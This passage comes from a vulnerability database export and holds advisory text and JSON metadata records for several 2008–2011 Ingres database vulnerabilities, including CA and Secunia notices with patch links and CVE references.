ServicePlus Service Desk 6.0\n\nThe Ingres release information is maintained in \n%II_SYSTEM%\\ingres\\version.rel:\n UNIX or Linux: cat version.rel\n\nThe release identifier will be as follows:\nOperating System Release identifier\nAIX 32bit II 2.6/xxxx (rs4.us5/00)\nAIX 64bit II 2.6/xxxx (r64.us5/00)\nHP-UX Itanium II 2.6/xxxx (i64.hpu/00)\nHP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00)\nHP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00)DBL\nHP-UX RISC 64bit II 2.6/xxxx (hp2.us5/00)\nHP Tru64 UNIX II 2.6/xxxx (axp.osf/00)\nLinux AMD64 II 2.6/xxxx (a64.lnx/00)\nLinux Intel 32bit II 2.6/xxxx (int.lnx/00)\nLinux Intel 32bit II 2.6/xxxx (int.lnx/00)DBL\nLinux Intel 32bit II 2.6/xxxx (int.lnx/00)LFS\nLinux Itanium II 2.6/xxxx (i64.lnx/00)\nLinux S/390 II 2.6/xxxx (ibm.lnx/00)\nSolaris SPARC 32bit II 2.6/xxxx (su4.us5/00)\nSolaris SPARC 32bit double II 2.6/xxxx (su4.us5/00)DBL\nSolaris SPARC 64bit II 2.6/xxxx (su9.us5/00)\n\nNote:\n1. If the Ingres release embedded in your product is not 2.6, \n please get the appropriate update here. \n2. If the OS platform you are running Ingres on is not listed, \n please contact Technical Support. \n3. For HP-UX platform with CA ARCserve Backup 11.1 or \n 11.5/GA/SP1/SP2/SP3, download the published ARCserve fix, \n RO01277:\n https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277\u0026os=HP\u0026actionID=3\n and follow the enclosed instructions to install the security \n patch. \n\n\nWorkaround: None\n\n\nReferences (URLs may wrap):\nCA Support:\nhttp://support.ca.com/\nSecurity Notice for CA Products That Embed Ingres\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989\nSolution Document Reference APARs:\nRO01277 (ARCserve only)\nCA Security Response Blog posting:\nCA Products That Embed Ingres Multiple Vulnerabilities\ncommunity.ca.com/blogs/casecurityresponseblog/archive/2008/08/06.aspx\nReported By: \niDefense Labs\nIngres Database for Linux verifydb Insecure File Permissions \n Modification Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731\nIngres Database for Linux libbecompat Stack Based Buffer Overflow \n Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732\nIngres Database for Linux ingvalidpw Untrusted Library Path \n Vulnerability\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733\nIngres\nSecurity Vulnerability Announcement as of August 01, 2008\nhttp://www.ingres.com/support/security-alert-080108.php\nCVE References:\nCVE-2008-3356 - Ingres verifydb file create permission override. \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3356\nCVE-2008-3357 - Ingres un-secure directory privileges with utility \n ingvalidpw. \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3357\nCVE-2008-3389 - Ingres verifydb, iimerge, csreport buffer overflow. \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3389\nOSVDB References: Pending\nhttp://osvdb.org/\n\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\n\nCustomers who require additional information should contact CA\nTechnical Support at http://support.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your \nfindings to our product security response team. \nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2008 CA. All rights reserved. ----------------------------------------------------------------------\n\nWant a new job?\n\nhttp://secunia.com/secunia_security_specialist/\nhttp://secunia.com/hardcore_disassembler_and_reverse_engineer/\n\nInternational Partner Manager - Project Sales in the IT-Security\nIndustry:\nhttp://corporate.secunia.com/about_secunia/64/\n\n----------------------------------------------------------------------\n\nTITLE:\nIngres Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA31357\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/31357/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nPrivilege escalation\n\nWHERE:\nLocal system\n\nSOFTWARE:\nIngres 2.x\nhttp://secunia.com/product/14576/\nIngres 2006 (9.x)\nhttp://secunia.com/product/14574/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in Ingres, which can be\nexploited by malicious, local users to gain escalated privileges. \n\n2) A boundary error exists within the \"libbecompat\" library that is\nused by several of the setuid \"ingres\" utilities. This can be\nexploited to cause a stack-based buffer overflow e.g. via a specially\ncrafted environmental variable. \n\n3) An error exists within the \"ingvalidpw\" utility due to being\nsetuid \"root\" and loading shared libraries from a directory owned by\nthe \"ingres\" user. \n\nSOLUTION:\nThe vendor has issued fixes. Please see the knowledge base document\n(customer login required). \nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:416012+HTMPL=kt_document_view.htmpl\n\nPROVIDED AND/OR DISCOVERED BY:\nAn anonymous researcher, reported via iDefense. \n\nORIGINAL ADVISORY:\nIngres:\nhttp://www.ingres.com/support/security-alert-080108.php\n\niDefense:\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-3356"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004681"
},
{
"db": "BID",
"id": "30512"
},
{
"db": "PACKETSTORM",
"id": "68784"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68872"
},
{
"db": "PACKETSTORM",
"id": "68816"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-3356",
"trust": 2.9
},
{
"db": "BID",
"id": "30512",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "31398",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "31357",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2008-2313",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2008-2292",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1020613",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004681",
"trust": 0.8
},
{
"db": "IDEFENSE",
"id": "20080801 INGRES DATABASE FOR LINUX VERIFYDB INSECURE FILE PERMISSIONS MODIFICATION VULNERABILITY",
"trust": 0.6
},
{
"db": "XF",
"id": "44177",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20080806 CA PRODUCTS THAT EMBED INGRES MULTIPLE VULNERABILITIES",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200808-048",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "68784",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68897",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68872",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68816",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "30512"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004681"
},
{
"db": "PACKETSTORM",
"id": "68784"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68872"
},
{
"db": "PACKETSTORM",
"id": "68816"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-048"
},
{
"db": "NVD",
"id": "CVE-2008-3356"
}
]
},
"id": "VAR-200808-0318",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2025-04-10T22:56:59.045000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "contentID=181989",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004681"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004681"
},
{
"db": "NVD",
"id": "CVE-2008-3356"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"trust": 2.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/30512"
},
{
"trust": 1.6,
"url": "http://securitytracker.com/id?1020613"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/31398"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/31357"
},
{
"trust": 1.5,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=181989"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44177"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3356"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-3356"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/44177"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/495177/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2008/2313"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2008/2292"
},
{
"trust": 0.5,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733"
},
{
"trust": 0.5,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732"
},
{
"trust": 0.3,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "/archive/1/495177"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3356"
},
{
"trust": 0.2,
"url": "http://secunia.com/hardcore_disassembler_and_reverse_engineer/"
},
{
"trust": 0.2,
"url": "http://secunia.com/secunia_security_specialist/"
},
{
"trust": 0.2,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.2,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/31357/"
},
{
"trust": 0.2,
"url": "http://corporate.secunia.com/about_secunia/64/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/),"
},
{
"trust": 0.1,
"url": "http://ingres.com/downloads/prod-cert-download.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7126/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14592/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5912/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14582/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/31398/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19467/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7129/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14437/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5904/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14602/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19468/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5582/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14596/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5905/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1684/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1683/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14589/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7120/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19466/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7114/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/312/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3357"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/solndtls?aparno=ro01277\u0026os=hp\u0026actionid=3"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3389"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=177782"
},
{
"trust": 0.1,
"url": "http://support.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3357"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3389"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:416012+htmpl=kt_document_view.htmpl"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14574/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14576/"
}
],
"sources": [
{
"db": "BID",
"id": "30512"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004681"
},
{
"db": "PACKETSTORM",
"id": "68784"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68872"
},
{
"db": "PACKETSTORM",
"id": "68816"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-048"
},
{
"db": "NVD",
"id": "CVE-2008-3356"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "30512"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004681"
},
{
"db": "PACKETSTORM",
"id": "68784"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68872"
},
{
"db": "PACKETSTORM",
"id": "68816"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-048"
},
{
"db": "NVD",
"id": "CVE-2008-3356"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-01T00:00:00",
"db": "BID",
"id": "30512"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004681"
},
{
"date": "2008-08-04T19:09:54",
"db": "PACKETSTORM",
"id": "68784"
},
{
"date": "2008-08-08T18:43:59",
"db": "PACKETSTORM",
"id": "68897"
},
{
"date": "2008-08-06T21:42:18",
"db": "PACKETSTORM",
"id": "68872"
},
{
"date": "2008-08-04T23:14:27",
"db": "PACKETSTORM",
"id": "68816"
},
{
"date": "2008-08-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-048"
},
{
"date": "2008-08-05T19:41:00",
"db": "NVD",
"id": "CVE-2008-3356"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-06T20:26:00",
"db": "BID",
"id": "30512"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004681"
},
{
"date": "2008-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-048"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2008-3356"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "30512"
},
{
"db": "PACKETSTORM",
"id": "68784"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68816"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-048"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linux Etc. Ingres of verifydb Vulnerable to overwriting arbitrary files",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004681"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200808-048"
}
],
"trust": 0.6
}
}
VAR-201108-0336
Vulnerability from variot - Updated: 2022-05-17 02:10Ingres Database is prone to an unspecified vulnerability that can be exploited to overflow data. The impact is currently unknown; however, this class of vulnerability may allow attackers to gain access to sensitive information, corrupt memory or cause a denial-of-service condition. Ingres Database versions 2.6, 9.1, 9.2, 9.3, and 10.0 for Windows are vulnerable.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201108-0336",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "9.3"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "9.2"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "9.1"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "10.0"
}
],
"sources": [
{
"db": "BID",
"id": "49435"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ingres community",
"sources": [
{
"db": "BID",
"id": "49435"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ingres Database is prone to an unspecified vulnerability that can be exploited to overflow data.\nThe impact is currently unknown; however, this class of vulnerability may allow attackers to gain access to sensitive information, corrupt memory or cause a denial-of-service condition.\nIngres Database versions 2.6, 9.1, 9.2, 9.3, and 10.0 for Windows are vulnerable.",
"sources": [
{
"db": "BID",
"id": "49435"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "49435",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "49435"
}
]
},
"id": "VAR-201108-0336",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2022-05-17T02:10:46.987000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "http://downloads.ingres.com/support/alert/ingres-secalert_august_30_2011_final_ingres.pdf"
}
],
"sources": [
{
"db": "BID",
"id": "49435"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "49435"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-08-30T00:00:00",
"db": "BID",
"id": "49435"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-08-30T00:00:00",
"db": "BID",
"id": "49435"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "49435"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ingres Database IIPROMPT Unspecified Vulnerability",
"sources": [
{
"db": "BID",
"id": "49435"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "49435"
}
],
"trust": 0.3
}
}
VAR-201001-0461
Vulnerability from variot - Updated: 2022-05-17 02:00Ingres Database is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code with the privileges of the application or crash the affected application. Ingres Database 9.3 on Unix is vulnerable; other versions may also be affected.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201001-0461",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "9.3"
}
],
"sources": [
{
"db": "BID",
"id": "38001"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Evgeny Legerov",
"sources": [
{
"db": "BID",
"id": "38001"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ingres Database is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.\nAttackers can exploit this issue to execute arbitrary code with the privileges of the application or crash the affected application.\nIngres Database 9.3 on Unix is vulnerable; other versions may also be affected.",
"sources": [
{
"db": "BID",
"id": "38001"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "38001",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "38001"
}
]
},
"id": "VAR-201001-0461",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2022-05-17T02:00:17.021000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "http://intevydis.blogspot.com/2010/01/ingres-93-heap-overflow.html"
}
],
"sources": [
{
"db": "BID",
"id": "38001"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
